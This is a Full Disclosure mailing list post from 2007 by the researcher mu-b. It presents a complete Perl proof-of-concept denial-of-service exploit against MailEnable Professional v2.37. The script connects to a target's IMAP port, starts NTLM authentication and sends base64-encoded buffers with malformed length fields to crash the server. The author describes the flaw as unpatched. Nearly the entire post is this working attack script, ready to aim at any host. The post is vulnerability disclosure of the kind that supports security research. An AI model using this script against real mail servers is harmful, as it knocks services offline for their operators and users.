Full Disclosure mailing list archives
MailEnable DoS POC-2
From: mu-b <mu-b () digit-labs org>
Date: Wed, 14 Feb 2007 17:43:31 +0000
This version will work on the latest MailEnable v2.37.. Symantec seem to think this is the same issue as BID 20290, but it is in fact, completely different... and somewhat unpatched.. --------------------------------------------------------------------------- (mu-b () digit-labs org)
#!/usr/bin/perl # # maildisable-v7.pl # # Mail Enable Professional/Enterprise v2.32-7 (win32) # by mu-b - Wed Feb 14 2007 # # - Tested on: Mail Enable Professional v2.37 (win32) # ######## use Getopt::Std; getopts('t:', \%arg); use Socket; use MIME::Base64; &print_header; my $target; if (defined($arg{'t'})) { $target = $arg{'t'} } if (!(defined($target))) { &usage; } my $imapd_port = 143; my $send_delay = 2; my $PAD = 'A'; if (connect_host($target, $imapd_port)) { print("-> * Connected\n"); send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0); sleep($send_delay); $buf = ($PAD x 12). "\xfa\xff\xff\xff". ($PAD x 12); send(SOCKET, encode_base64($buf)."\r\n", 0); sleep($send_delay); $buf = ($PAD x 28). "\x00\x01". ($PAD x 2). "\xff\xff\xff\x7f"; send(SOCKET, encode_base64($buf)."\r\n", 0); sleep($send_delay); print("-> * Successfully sent payload!\n"); } sub print_header { print("MailEnable Pro v2.37 DoS POC\n"); print("by: <mu-b\@digit-labs.org>\n\n"); } sub usage { print(qq(Usage: $0 -t <hostname> -t <hostname> : hostname to test )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); return(1338); }
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MailEnable DoS POC-2 mu-b (Feb 14)